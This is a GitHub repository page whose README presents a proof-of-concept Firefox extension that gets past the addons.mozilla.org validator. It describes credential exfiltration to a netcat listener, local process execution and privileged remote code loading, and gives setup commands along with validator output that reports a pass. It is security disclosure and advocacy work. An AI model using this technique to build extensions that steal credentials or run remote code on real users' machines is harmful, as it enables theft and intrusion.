Skip to content

dstillman/amo-validator-bypass

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
chrome/content
 
 
remote
 
 
README.md
 
 
build.sh
 
 
chrome.manifest
 
 
install.rdf
 
 
AMO Validator Bypass Proof of Concept Installation Running Data exfiltration Local process execution Remote code execution Validating

README.md

AMO Validator Bypass Proof of Concept

This is a trivial Firefox extension that performs three potentially malicious tasks but would nevertheless be automatically signed by the addons.mozilla.org validator.

The validator cannot be improved to catch these behaviors. As a Mozilla engineer says:

There is simply no way to detect malicious code like this in a dynamic language like JS through static analysis of the source code.

For full context, see Automated Scanning of Firefox Extensions is Security Theater.

Installation

  1. git clone https://github.com/dstillman/amo-validator-bypass.git
  2. Running a dev build? Don't forget to set xpinstall.signatures.required to false! Fortunately that wouldn't be necessary once this was automatically signed…
  3. Create a text file named amo-validator-bypass@example.net in your Firefox profile's extensions directory containing the path to the cloned repo.
  4. Start Firefox.

Running

Data exfiltration

  1. Start netcat listening on a local port:
% nc -l 11111
  1. Load http://test.webdav.org/auth-basic/ or any Basic Auth–protected site and enter any username and password.

Your Base64-encoded username and password should show up in the netcat output. This could be any other sensitive data, and it could just as easily be POSTed to a remote server.

Local process execution

(The default executable is available only on OS X. Feel free to sub in another program for your platform.)

An OS X system dialog should appear, spawned via the osascript command-line tool.

Remote code execution

  1. Start an HTTP server in the remote directory of the local repo:
% cd remote
% python -m SimpleHTTPServer 11112
  1. Load https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/

An alert will appear showing the path to the Firefox profile directory. This alert is generated by unvalidated remote code that runs with full privileges.

Validating

Via amo-validator:

% ./build.sh
% amo-validator --selfhosted -v ../bypass.xpi

Summary:
------------------------------
Detected type: Extension/Multi-Extension
------------------------------
All tests succeeded!

Notice:	Add-on appears not to be localized
The add-on doesn't have any locale entries in its chrome.manifest file, which suggests that it may not be localized.
	Tier:	4
	File:	chrome.manifest

Via addons-validator

% ./build.sh
% addons-validator ../bypass.xpi

Validation Summary:

errors          0
notices         0
warnings        0

Via the online validator:

Your submission passed validation and will be automatically signed.

About

No description, website, or topics provided.

Resources

Readme

Stars

14 stars

Watchers

4 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages